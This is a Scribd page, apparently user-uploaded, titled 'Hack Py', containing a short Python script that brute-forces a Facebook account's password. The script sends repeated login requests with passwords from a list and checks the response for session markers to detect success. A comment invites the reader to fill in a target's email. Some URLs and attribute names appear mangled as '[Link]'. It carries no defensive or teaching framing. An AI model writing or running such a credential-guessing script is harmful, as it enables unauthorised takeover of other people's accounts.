0% found this document useful (0 votes)
45 views1 page

Hack Py

Uploaded by

izelhamza2512
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
45 views1 page

Hack Py

Uploaded by

izelhamza2512
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

import requests

def brute_force_facebook(email, password_list):


login_url = "[Link]
headers = {
"User-Agent": "Mozilla/5.0"
}

for password in password_list:


response = [Link](login_url, data={
"email": email,
"pass": password
}, headers=headers)

if "home_icon" in [Link] or "c_user" in [Link]:


print(f"[+] Password found: {password}")
return password
else:
print(f"[-] Password failed: {password}")

print("[!] Password not found in list")


return None

# Replace with the target email and a list of possible passwords


email = "target_email@[Link]"
password_list = ["123456", "password", "letmein", "qwerty", "abc123"]

brute_force_facebook(email, password_list)

You might also like